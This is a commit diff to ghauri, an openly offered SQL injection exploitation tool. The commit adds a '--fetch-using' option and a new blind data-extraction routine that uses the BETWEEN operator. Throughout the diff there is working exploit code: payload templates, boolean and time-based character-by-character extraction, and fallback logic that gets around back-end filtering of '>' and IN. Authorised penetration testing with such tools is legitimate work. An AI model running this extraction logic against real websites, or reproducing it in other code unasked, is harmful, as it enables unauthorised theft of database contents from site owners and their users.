STRLCPY/ghauri

added switch '--fetch-using=between' for between and in based operator for data retrieval, updated code quality fixed issue with custom marker detection when no level is provided
r0oth3x49 committed 1 year ago

95d53fb4

1 parent 3c96dbf0

■ ■ ■ ■ ■ ■

README.md

1		-	[![GitHub release](https://img.shields.io/badge/release-v1.1.6-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.6)
	1	+	[![GitHub release](https://img.shields.io/badge/release-v1.1.7-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.7)
2	2		[![GitHub stars](https://img.shields.io/github/stars/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/stargazers)
3	3		[![GitHub forks](https://img.shields.io/github/forks/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/network)
4	4		[![GitHub issues](https://img.shields.io/github/issues/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/issues)
		skipped 87 lines
92	92		--delay Delay in seconds between each HTTP request
93	93		--timeout Seconds to wait before timeout connection (default 30)
94	94		--retries Retries when the connection related error occurs (default 3)
	95	+	--confirm Confirm the injected payloads.
95	96		--skip-urlencode Skip URL encoding of payload data
96	97		--force-ssl Force usage of SSL/HTTPS
97	98
		skipped 10 lines
108	109		--dbms DBMS Force back-end DBMS to provided value
109	110		--prefix Injection payload prefix string
110	111		--suffix Injection payload suffix string
	112	+	--safe-chars Skip URL encoding of specific character(s): (e.g:- --safe-chars="[]")
	113	+	--fetch-using Fetch data using different operator(s): (e.g: --fetch-using=between/in)
111	114
112	115		Detection:
113	116		These options can be used to customize the detection phase
		skipped 48 lines

■ ■ ■ ■ ■ ■

ghauri/__init__.py

		skipped 23 lines
24	24
25	25		"""
26	26
27		-	__version__ = "1.1.6"
	27	+	__version__ = "1.1.7"
28	28		__author__ = "Nasir Khan (r0ot h3x49)"
29	29		__license__ = "MIT"
30	30		__copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"
		skipped 2 lines

■ ■ ■ ■ ■ ■

ghauri/common/config.py

		skipped 95 lines
96	96		self.confirm_payloads = False
97	97		self.safe_chars = None
98	98		self.rto_warning = False
	99	+	self.fetch_using = None
99	100		self.rtom_warning = False
100	101
101	102		@property
		skipped 8 lines

■ ■ ■ ■ ■ ■

ghauri/common/utils.py

		skipped 1423 lines
1424	1424		return conf._json_post_data
1425	1425
1426	1426
1427		-	def check_injection_points_for_level(level, injection_points):
	1427	+	def check_injection_points_for_level(level, obj):
1428	1428		is_ok = False
	1429	+	custom_injection_in = obj.custom_injection_in
	1430	+	injection_points = obj.injection_point
1429	1431		GET = injection_points.get("GET", [])
1430	1432		POST = injection_points.get("POST", [])
1431	1433		COOKIES = injection_points.get("COOKIE", [])
1432	1434		HEADERS = injection_points.get("HEADER", [])
1433		-	if level == 1:
1434		-	if GET or POST:
1435		-	is_ok = True
1436		-	if level == 2:
1437		-	if GET or POST or COOKIES:
1438		-	is_ok = True
1439		-	if level == 3:
1440		-	if GET or POST or COOKIES or HEADERS:
1441		-	is_ok = True
	1435	+	if custom_injection_in:
	1436	+	is_ok = True
	1437	+	else:
	1438	+	if level == 1:
	1439	+	if GET or POST:
	1440	+	is_ok = True
	1441	+	if level == 2:
	1442	+	if GET or POST or COOKIES:
	1443	+	is_ok = True
	1444	+	if level == 3:
	1445	+	if GET or POST or COOKIES or HEADERS:
	1446	+	is_ok = True
1442	1447		return is_ok
1443	1448
1444	1449
		skipped 596 lines

■ ■ ■ ■ ■ ■ ■

ghauri/core/extract.py

		skipped 97 lines
98	98		):
99	99		GuessUsing = collections.namedtuple(
100	100		"GuessUsing",
101		-	["ok", "binary_search", "in_based_search", "linear_search", "msg"],
	101	+	[
	102	+	"ok",
	103	+	"binary_search",
	104	+	"in_based_search",
	105	+	"linear_search",
	106	+	"between_based_search",
	107	+	"msg",
	108	+	],
102	109		)
103	110		binary_search = False
104	111		in_based_search = False
105	112		linear_search = False
	113	+	between_based_search = False
106	114		retry_on_error = 0
107	115		http_firewall_code_counter = 0
108	116		timesec = conf.timesec
		skipped 3 lines
112	120		binary_search=binary_search,
113	121		in_based_search=in_based_search,
114	122		linear_search=linear_search,
	123	+	between_based_search=between_based_search,
115	124		msg=None,
116	125		)
117	126		expressions = [
		skipped 5 lines
123	132		},
124	133		{
125	134		"expression": vector.replace(
	135	+	"[INFERENCE]", "6590 NOT BETWEEN 0 AND 6420"
	136	+	).replace("[SLEEPTIME]", f"{timesec}"),
	137	+	"type": "between_based_search",
	138	+	},
	139	+	{
	140	+	"expression": vector.replace(
126	141		"[INFERENCE]", "(SELECT(45))IN(10,45,60)"
127	142		).replace("[SLEEPTIME]", f"{timesec}"),
128	143		"type": "in_based_search",
		skipped 6 lines
135	150		},
136	151		]
137	152		start = 0
	153	+	operators = {
	154	+	"greater": "binary_search",
	155	+	"between": "between_based_search",
	156	+	"in": "in_based_search",
	157	+	"equal": "linear_search",
	158	+	}
	159	+	operator = None
	160	+	if conf.fetch_using and conf.fetch_using in list(operators.keys()):
	161	+	operator = operators.get(conf.fetch_using, None)
	162	+	if operator:
	163	+	logger.debug(
	164	+	f"Ghauri will based data retrieval using '{conf.fetch_using}' openator"
	165	+	)
	166	+	# if conf.fetch_using == "in":
	167	+	# _temp = GuessUsing(
	168	+	# ok=True,
	169	+	# binary_search=binary_search,
	170	+	# in_based_search=True,
	171	+	# linear_search=linear_search,
	172	+	# between_based_search=between_based_search,
	173	+	# msg="",
	174	+	# )
	175	+	# if conf.fetch_using == "binary":
	176	+	# _temp = GuessUsing(
	177	+	# ok=True,
	178	+	# binary_search=True,
	179	+	# in_based_search=in_based_search,
	180	+	# linear_search=linear_search,
	181	+	# between_based_search=between_based_search,
	182	+	# msg="",
	183	+	# )
	184	+	# if conf.fetch_using == "between":
	185	+	# _temp = GuessUsing(
	186	+	# ok=True,
	187	+	# binary_search=binary_search,
	188	+	# in_based_search=in_based_search,
	189	+	# linear_search=linear_search,
	190	+	# between_based_search=True,
	191	+	# msg="",
	192	+	# )
	193	+	# if conf.fetch_using == "equal":
	194	+	# _temp = GuessUsing(
	195	+	# ok=True,
	196	+	# binary_search=binary_search,
	197	+	# in_based_search=in_based_search,
	198	+	# linear_search=True,
	199	+	# between_based_search=between_based_search,
	200	+	# msg="",
	201	+	# )
	202	+	# return _temp
138	203		end = len(expressions)
139	204		while start < end:
140	205		entry = expressions[start]
141	206		expression = entry.get("expression")
142	207		_type = entry.get("type")
	208	+	if operator and _type != operator:
	209	+	start += 1
	210	+	continue
143	211		logger.payload(f"{expression}")
144	212		# if http_firewall_code_counter > 2:
145	213		# message = f"{error_msg} - {http_firewall_code_counter} time(s)"
		skipped 9 lines
155	223		# exit(0)
156	224		# if choice == "c":
157	225		# http_firewall_code_counter = 0
158		-	# if retry_on_error >= retry:
159		-	# logger.warning(f"Ghauri detected connection errors multiple times")
160		-	# choice = logger.read_input(
161		-	# f"how do you want to proceed? [(C)continue/(q)uit] ",
162		-	# batch=False,
163		-	# user_input="C",
164		-	# )
165		-	# if choice == "q":
166		-	# logger.error("user quit")
167		-	# logger.end("ending")
168		-	# exit(0)
169		-	# if choice == "c":
170		-	# retry_on_error = 0
	226	+	if retry_on_error >= conf.retry:
	227	+	start += 1
	228	+	# logger.warning(f"Ghauri detected connection errors multiple times")
	229	+	# choice = logger.read_input(
	230	+	# f"how do you want to proceed? [(C)continue/(q)uit] ",
	231	+	# batch=False,
	232	+	# user_input="C",
	233	+	# )
	234	+	# if choice == "q":
	235	+	# logger.error("user quit")
	236	+	# logger.end("ending")
	237	+	# exit(0)
	238	+	# if choice == "c":
	239	+	# retry_on_error = 0
171	240		if delay > 0:
172	241		time.sleep(delay)
173	242		try:
		skipped 36 lines
210	279		binary_search=True,
211	280		in_based_search=in_based_search,
212	281		linear_search=linear_search,
	282	+	between_based_search=between_based_search,
213	283		msg="",
214	284		)
	285	+	if _type == "between_based_search":
	286	+	msg = "it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on BETWEEN operator"
	287	+	if conf.fetch_using:
	288	+	msg = ""
	289	+	_temp = GuessUsing(
	290	+	ok=True,
	291	+	binary_search=binary_search,
	292	+	in_based_search=in_based_search,
	293	+	linear_search=linear_search,
	294	+	between_based_search=True,
	295	+	msg=msg,
	296	+	)
215	297		if _type == "in_based_search":
	298	+	msg = (
	299	+	"it appears that the character '>' and 'BETWEEN' operator is filtered by the back-end server. ghauri will based data retrieval on IN() operator",
	300	+	)
	301	+	if conf.fetch_using:
	302	+	msg = ""
216	303		_temp = GuessUsing(
217	304		ok=True,
218	305		binary_search=binary_search,
219	306		in_based_search=True,
220	307		linear_search=linear_search,
221		-	msg="it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on IN() function",
	308	+	between_based_search=between_based_search,
	309	+	msg=msg,
222	310		)
223	311		if _type == "linear_search":
	312	+	msg = (
	313	+	"it appears that the character '>' and the operator(s) 'IN, BETWEEN' are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",
	314	+	)
	315	+	if conf.fetch_using:
	316	+	msg = ""
224	317		_temp = GuessUsing(
225	318		ok=True,
226	319		binary_search=binary_search,
227	320		in_based_search=in_based_search,
228	321		linear_search=True,
229		-	msg="it appears that the character '>' and function 'IN' both are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",
	322	+	between_based_search=between_based_search,
	323	+	msg=msg,
230	324		)
231	325		break
232	326		if vector_type == "time_vector":
		skipped 5 lines
238	332		binary_search=True,
239	333		in_based_search=in_based_search,
240	334		linear_search=linear_search,
241		-	msg=None,
	335	+	between_based_search=between_based_search,
	336	+	msg="",
	337	+	)
	338	+	if _type == "between_based_search":
	339	+	msg = "it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on BETWEEN operator"
	340	+	if conf.fetch_using:
	341	+	msg = ""
	342	+	_temp = GuessUsing(
	343	+	ok=True,
	344	+	binary_search=binary_search,
	345	+	in_based_search=in_based_search,
	346	+	linear_search=linear_search,
	347	+	between_based_search=True,
	348	+	msg=msg,
242	349		)
243	350		if _type == "in_based_search":
	351	+	msg = (
	352	+	"it appears that the character '>' and 'BETWEEN' operator is filtered by the back-end server. ghauri will based data retrieval on IN() operator",
	353	+	)
	354	+	if conf.fetch_using:
	355	+	msg = ""
244	356		_temp = GuessUsing(
245	357		ok=True,
246	358		binary_search=binary_search,
247	359		in_based_search=True,
248	360		linear_search=linear_search,
249		-	msg="it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on IN() function",
	361	+	between_based_search=between_based_search,
	362	+	msg=msg,
250	363		)
251	364		if _type == "linear_search":
	365	+	msg = (
	366	+	"it appears that the character '>' and the operator(s) 'IN, BETWEEN' are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",
	367	+	)
	368	+	if conf.fetch_using:
	369	+	msg = ""
252	370		_temp = GuessUsing(
253	371		ok=True,
254	372		binary_search=binary_search,
255	373		in_based_search=in_based_search,
256	374		linear_search=True,
257		-	msg="it appears that the character '>' and function 'IN' both are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",
	375	+	between_based_search=between_based_search,
	376	+	msg=msg,
258	377		)
259	378		break
260	379		start += 1
		skipped 415 lines
676	795		retry_on_error += 1
677	796		return character
678	797
	798	+	def _search_using_between_operator(
	799	+	self,
	800	+	url,
	801	+	data,
	802	+	vector,
	803	+	parameter,
	804	+	headers,
	805	+	base,
	806	+	injection_type,
	807	+	delay=0,
	808	+	timesec=5,
	809	+	timeout=30,
	810	+	proxy=None,
	811	+	attack01=None,
	812	+	code=None,
	813	+	match_string=None,
	814	+	not_match_string=None,
	815	+	text_only=False,
	816	+	is_multipart=False,
	817	+	suppress_output=False,
	818	+	query_check=False,
	819	+	minimum=None,
	820	+	maximum=None,
	821	+	offset=0,
	822	+	expression_payload=None,
	823	+	queryable=None,
	824	+	chars="",
	825	+	vector_type=None,
	826	+	retry=3,
	827	+	*args,
	828	+	**kwargs,
	829	+	):
	830	+	# need to implement retry mechanism in case of http connection related errors..
	831	+	if not minimum:
	832	+	minimum = 32
	833	+	if not maximum:
	834	+	maximum = 127
	835	+	ascii_char = 0
	836	+	is_found = False
	837	+	character = ""
	838	+	http_firewall_code_counter = 0
	839	+	error_msg = None
	840	+	retry_on_error = 0
	841	+	if not conf.threads:
	842	+	logger.progress(f"retrieved: {chars}")
	843	+	if conf.threads:
	844	+	chars = "".join(
	845	+	[
	846	+	str(i)
	847	+	for i in collections.OrderedDict(
	848	+	sorted(conf._thread_chars_query.items())
	849	+	).values()
	850	+	]
	851	+	)
	852	+	logger.progress(f"retrieved: {chars}")
	853	+	sleep_time = conf.timesec
	854	+	while not is_found:
	855	+	if conf._readtimout_counter >= 3:
	856	+	if conf.rto_warning:
	857	+	if not conf.rtom_warning:
	858	+	choice = logger.read_input(
	859	+	"Ghauri detected read timeout multiple time(s). Do you want to continue? [y/N] "
	860	+	)
	861	+	if choice == "n":
	862	+	logger.end("ending")
	863	+	exit(0)
	864	+	conf.rtom_warning = True
	865	+	if not conf.rto_warning:
	866	+	msgrto = ""
	867	+	if vector_type == "time_vector":
	868	+	msgrto = ", It is recommended to set high value of option(s) '--time-sec', increase delay between request(s) with an option '--delay'"
	869	+	if vector_type == "boolean_vector":
	870	+	msgrto = ", It is recommended to set high value of option(s) '--timeout' and also increase delay between each http request with an option '--delay'"
	871	+	logger.warning(
	872	+	f"Ghauri detected read timout '{conf._readtimout_counter}' time(s){msgrto}."
	873	+	)
	874	+	conf.rto_warning = True
	875	+	conf._readtimout_counter = 0
	876	+	if delay > 0:
	877	+	time.sleep(delay)
	878	+	ascii_char = int((minimum + maximum) / 2)
	879	+	if (minimum == ascii_char) & (maximum == ascii_char):
	880	+	is_found = True
	881	+	character = str(chr(ascii_char))
	882	+	if not conf.threads:
	883	+	logger.progress(f"retrieved: {chars}{character}")
	884	+	if conf.threads:
	885	+	conf._thread_chars_query.update({offset: character})
	886	+	chars = "".join(
	887	+	[
	888	+	str(i)
	889	+	for i in collections.OrderedDict(
	890	+	conf._thread_chars_query.items()
	891	+	).values()
	892	+	]
	893	+	)
	894	+	logger.progress(f"retrieved: {chars}")
	895	+	break
	896	+	condition = expression_payload.format(
	897	+	query=queryable, position=offset, char=ascii_char
	898	+	)
	899	+	condition = replace_with(
	900	+	string=condition, character="=", replace_with=" NOT BETWEEN 0 AND "
	901	+	)
	902	+	expression = vector.replace("[INFERENCE]", f"{condition}").replace(
	903	+	"[SLEEPTIME]", f"{sleep_time}"
	904	+	)
	905	+	logger.payload(f"{expression}")
	906	+	try:
	907	+	attack = inject_expression(
	908	+	url=url,
	909	+	data=data,
	910	+	proxy=proxy,
	911	+	delay=delay,
	912	+	timesec=timesec,
	913	+	timeout=timeout,
	914	+	headers=headers,
	915	+	parameter=parameter,
	916	+	expression=expression,
	917	+	is_multipart=is_multipart,
	918	+	injection_type=injection_type,
	919	+	)
	920	+	response_time = attack.response_time
	921	+	logger.debug(
	922	+	f"sleep time: {sleep_time}, response time: {response_time}"
	923	+	)
	924	+	if attack01 and vector_type == "boolean_vector":
	925	+	bool_retval = check_boolean_responses(
	926	+	base,
	927	+	attack,
	928	+	attack01,
	929	+	code=code,
	930	+	match_string=match_string,
	931	+	not_match_string=not_match_string,
	932	+	text_only=text_only,
	933	+	)
	934	+	result = bool_retval.vulnerable
	935	+	if result:
	936	+	minimum = ascii_char + 1
	937	+	maximum = maximum
	938	+	else:
	939	+	minimum = minimum
	940	+	maximum = ascii_char
	941	+	if vector_type == "time_vector":
	942	+	if response_time >= sleep_time:
	943	+	minimum = ascii_char + 1
	944	+	maximum = maximum
	945	+	else:
	946	+	minimum = minimum
	947	+	maximum = ascii_char
	948	+	except KeyboardInterrupt as error:
	949	+	if conf.threads:
	950	+	raise error
	951	+	logger.warning("user aborted during data extraction phase")
	952	+	quest = logger.read_input(
	953	+	"how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ",
	954	+	batch=False,
	955	+	user_input="C",
	956	+	)
	957	+	if quest and quest == "e":
	958	+	raise error
	959	+	if quest and quest == "q":
	960	+	logger.error("user quit")
	961	+	logger.end("ending")
	962	+	exit(0)
	963	+	except ConnectionAbortedError as e:
	964	+	logger.critical(
	965	+	f"connection attempt to the target URL was aborted by the peer, Ghauri is going to retry"
	966	+	)
	967	+	retry_on_error += 1
	968	+	except ConnectionRefusedError as e:
	969	+	logger.critical(
	970	+	f"connection attempt to the target URL was refused by the peer. Ghauri is going to retry"
	971	+	)
	972	+	retry_on_error += 1
	973	+	except ConnectionResetError as e:
	974	+	logger.critical(
	975	+	f"connection attempt to the target URL was reset by the peer. Ghauri is going to retry"
	976	+	)
	977	+	retry_on_error += 1
	978	+	except Exception as error:
	979	+	logger.critical(
	980	+	f"error {error}, during detection phase. Ghauri is going to retry"
	981	+	)
	982	+	retry_on_error += 1
	983	+	return character
	984	+
679	985		def _binary_search(
680	986		self,
681	987		url,
		skipped 1008 lines
1690	1996		binary_search = False
1691	1997		in_based_search = False
1692	1998		linear_search = False
	1999	+	between_based_search = False
1693	2000		is_resumed = False
1694	2001		start_pos = 1
1695	2002		start_chars = ""
		skipped 91 lines
1787	2094		binary_search = retval_check.binary_search
1788	2095		in_based_search = retval_check.in_based_search
1789	2096		linear_search = retval_check.linear_search
	2097	+	between_based_search = retval_check.between_based_search
1790	2098		if not retval_check.ok:
1791	2099		logger.critical(
1792	2100		"ghauri will not be able to extract data as '=', 'IN' and '>' all are filtered by back-end server.."
		skipped 8 lines
1801	2109		chars = start_chars
1802	2110		pos = start_pos
1803	2111		total_length = length + 1
1804		-	if conf.threads and not binary_search and not in_based_search:
	2112	+	if (
	2113	+	conf.threads
	2114	+	and not binary_search
	2115	+	and not in_based_search
	2116	+	and not between_based_search
	2117	+	):
1805	2118		logger.debug(
1806	2119		"Ghauri will use a fallback leaner search to guess character(s), adjusting threads to 1"
1807	2120		)
		skipped 33 lines
1841	2154		exfiltration_func = self._binary_search
1842	2155		if in_based_search:
1843	2156		exfiltration_func = self._search_using_in_operator
1844		-	# if linear_search:
1845		-	# exfiltration_func = self._linear_search
	2157	+	if between_based_search:
	2158	+	exfiltration_func = (
	2159	+	self._search_using_between_operator
	2160	+	)
1846	2161		exec_map = {
1847	2162		ex.submit(
1848	2163		exfiltration_func,
		skipped 141 lines
1990	2305		)
1991	2306		bool_invalid_character_counter += 1
1992	2307		binary_search = False
	2308	+	between_based_search = True
	2309	+	in_based_search = False
	2310	+	linear_search = False
	2311	+	if is_valid:
	2312	+	pos += 1
	2313	+	chars += retval
	2314	+	elif between_based_search:
	2315	+	retval = (
	2316	+	self._search_using_between_operator(
	2317	+	url=url,
	2318	+	data=data,
	2319	+	vector=vector,
	2320	+	parameter=parameter,
	2321	+	headers=headers,
	2322	+	base=base,
	2323	+	injection_type=injection_type,
	2324	+	delay=delay,
	2325	+	timesec=timesec,
	2326	+	timeout=timeout,
	2327	+	proxy=proxy,
	2328	+	attack01=attack01,
	2329	+	code=code,
	2330	+	match_string=match_string,
	2331	+	not_match_string=not_match_string,
	2332	+	is_multipart=is_multipart,
	2333	+	suppress_output=suppress_output,
	2334	+	query_check=query_check,
	2335	+	minimum=32,
	2336	+	maximum=127,
	2337	+	offset=pos,
	2338	+	expression_payload=value,
	2339	+	queryable=entry,
	2340	+	chars=chars,
	2341	+	text_only=text_only,
	2342	+	vector_type=vector_type,
	2343	+	)
	2344	+	)
	2345	+	if retval:
	2346	+	is_valid = self.validate_character(
	2347	+	url=url,
	2348	+	data=data,
	2349	+	vector=vector,
	2350	+	parameter=parameter,
	2351	+	headers=headers,
	2352	+	base=base,
	2353	+	injection_type=injection_type,
	2354	+	proxy=proxy,
	2355	+	is_multipart=is_multipart,
	2356	+	timeout=timeout,
	2357	+	delay=delay,
	2358	+	timesec=timesec,
	2359	+	identified_character=retval,
	2360	+	vector_type=vector_type,
	2361	+	offset=pos,
	2362	+	expression_payload=value,
	2363	+	queryable=entry,
	2364	+	code=code,
	2365	+	match_string=match_string,
	2366	+	not_match_string=not_match_string,
	2367	+	attack01=attack01,
	2368	+	)
	2369	+	if not is_valid:
	2370	+	logger.warning(
	2371	+	"invalid character detected, retrying."
	2372	+	)
	2373	+	bool_invalid_character_counter += 1
	2374	+	binary_search = False
	2375	+	between_based_search = False
1993	2376		in_based_search = True
1994	2377		linear_search = False
1995	2378		if is_valid:
		skipped 408 lines

■ ■ ■ ■ ■ ■

ghauri/ghauri.py

		skipped 86 lines
87	87		threads=None,
88	88		confirm_payloads=False,
89	89		safe_chars=None,
	90	+	fetch_using=None,
90	91		):
91	92		verbose_levels = {
92	93		1: logging.INFO,
		skipped 7 lines
100	101		conf.confirm_payloads = confirm_payloads
101	102		conf.safe_chars = safe_chars
102	103		conf.timesec = timesec
	104	+	conf.fetch_using = fetch_using
103	105		logger.start("starting")
104	106		if not force_ssl:
105	107		ssl._create_default_https_context = ssl._create_unverified_context
		skipped 92 lines
198	200		conf.filepaths = filepaths
199	201		filepath = os.path.dirname(filepaths.logs)
200	202		set_level(verbose_level, filepaths.logs)
201		-	is_params_found = check_injection_points_for_level(level, injection_points)
	203	+	is_params_found = check_injection_points_for_level(level, obj)
202	204		if not is_params_found:
203	205		logger.critical(
204	206		"no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"
		skipped 619 lines

■ ■ ■ ■ ■ ■

ghauri/scripts/ghauri.py

		skipped 242 lines
243	243		"--safe-chars",
244	244		dest="safe_chars",
245	245		type=str,
246		-	help='Skip URL encoding of specific character(s): (e.g:- --safe-chars="[]"',
	246	+	help='Skip URL encoding of specific character(s): (e.g:- --safe-chars="[]")',
	247	+	default=None,
	248	+	metavar="",
	249	+	)
	250	+	injection.add_argument(
	251	+	"--fetch-using",
	252	+	dest="fetch_using",
	253	+	type=str,
	254	+	help="Fetch data using different operator(s): (e.g: --fetch-using=between/in)",
247	255		default=None,
248	256		metavar="",
249	257		)
		skipped 196 lines
446	454		threads=args.threads,
447	455		confirm_payloads=args.confirm_payloads,
448	456		safe_chars=args.safe_chars,
	457	+	fetch_using=args.fetch_using,
449	458		)
450	459		if resp.is_injected:
451	460		target = ghauri.Ghauri(
		skipped 71 lines

■ ■ ■ ■ ■ ■

setup.py

		skipped 4 lines
5	5
6	6		setup(
7	7		name="ghauri",
8		-	version="1.1.6",
	8	+	version="1.1.7",
9	9		description="An advanced SQL injection detection & exploitation tool.",
10	10		classifiers=["Programming Language :: Python3"],
11	11		author="Nasir Khan",
		skipped 28 lines

added switch '--fetch-using=between' for between and in based operator for data retrieval, updated code quality fixed issue with custom marker detection when no level is provided